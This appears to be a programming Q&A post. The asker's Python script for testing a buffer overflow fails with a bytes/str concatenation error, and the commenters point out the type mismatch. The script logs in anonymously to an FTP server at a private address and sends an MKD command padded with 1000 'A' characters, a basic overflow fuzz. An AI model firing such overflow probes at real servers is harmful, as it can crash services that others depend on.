# Why can't concat str to bytes in my python3 result

Tags: python-3.x

Hello I'm facing one error in my python3 script for test buffer overflow. My script output is "TypeError: can't concat str to bytes" how can i fix?

```
import socket 
import sys   
evil = "A"*1000   
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 
connect=s.connect(('10.10.10.9',21))   
s.recv(1024) 
s.send(b'USER anonymous\r\n') 
s.recv(1024) 
s.send(b'PASS anonymous\r\n') 
s.recv(1024) 
s.send(b'MKD ' + evil + '\r\n')
s.recv(1024) 
s.send(b'QUIT\r\n') 
s.close
```

Comment: `b'MKD '` is a bytearray. `evil + '\r\n'` is a string. You can't concatenate them.

Comment: Does this answer your question? [Can't concat bytes to str](https://stackoverflow.com/questions/21916888/cant-concat-bytes-to-str)

Comment: Or this: https://stackoverflow.com/a/46281174/6486738